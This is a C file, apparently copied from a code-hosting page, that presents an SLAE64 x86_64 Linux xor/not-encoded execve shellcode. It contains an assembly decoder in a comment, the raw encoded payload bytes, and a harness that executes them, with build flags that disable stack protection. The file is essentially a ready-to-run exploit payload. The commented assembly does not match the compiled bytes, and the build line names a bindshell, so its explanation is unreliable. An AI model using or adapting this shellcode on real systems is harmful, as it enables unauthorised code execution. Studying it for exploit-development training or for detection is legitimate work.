63 lines
No EOL
1.7 KiB
C
63 lines
No EOL
1.7 KiB
C
/*---------------------------------------------------------------------------------------------------------------------
|
|
/*
|
|
*Title: x86_64 linux-Xor/not/div encoded execve shellcode
|
|
*Author: Sathish kumar
|
|
*Contact: https://www.linkedin.com/in/sathish94
|
|
* Copyright: (c) 2016 iQube. (http://iQube.io)
|
|
* Release Date: January 6, 2016
|
|
*Description: X86_64 linux-Xor/not/div encoded execve shellcode 54 bytes
|
|
*Tested On: Ubuntu 14.04 LTS
|
|
*SLAE64-1408
|
|
*Build/Run: gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
|
|
* ./bindshell
|
|
*
|
|
*
|
|
*/
|
|
/*
|
|
global _start
|
|
section .text
|
|
_start:
|
|
|
|
|
|
jmp short call_shellcode
|
|
|
|
|
|
decoder:
|
|
pop rdi
|
|
xor rcx, rcx
|
|
xor rdx, rdx
|
|
xor rax, rax
|
|
mov cl, 26
|
|
|
|
decode:
|
|
not byte [rdi] ; not function is appplied
|
|
xor byte [rdi], 0xee ; xor function with 0xee
|
|
mov rax, rdi ; multiplication is done
|
|
mov ecx, 0x2
|
|
mul ecx
|
|
mov rdi, rax
|
|
inc rdi
|
|
loop decode ; loop continues until the shellcode size is completed
|
|
|
|
jmp short shellcode_to_decode ; Pointed to the decoded shellcode
|
|
|
|
call_shellcode:
|
|
call decoder
|
|
shellcode_to_decode: db 0x35,0x09,0x6a,0x35,0x6a,0x62,0x22,0x39,0x35,0x4c,0x06,0x20,0x25,0x26,0x06,0x06,0x28,0x25,0x38,0x3b,0x3e,0x24,0x0c,0x3d,0x16,0x13
|
|
*/
|
|
|
|
#include<stdio.h>
|
|
#include<string.h>
|
|
|
|
unsigned char code[] = \
|
|
"\xeb\x15\x5f\x48\x31\xc9\xb1\x1a\x80\x37\xee\xf6\x17\x80\x2f\x03\x48\xff\xc7\xe2\xf3\xeb\x05\xe8\xe6\xff\xff\xff\x5a\x25\xe8\x5a\xeb\xf8\x78\x42\x5a\xaf\x23\x74\x7d\x60\x23\x23\x67\x7a\x47\x46\x73\x7c\x2f\x4a\x03\x19";
|
|
main()
|
|
{
|
|
|
|
printf("Shellcode Length: %d\n", (int)strlen(code));
|
|
|
|
int (*ret)() = (int(*)())code;
|
|
|
|
ret();
|
|
|
|
} |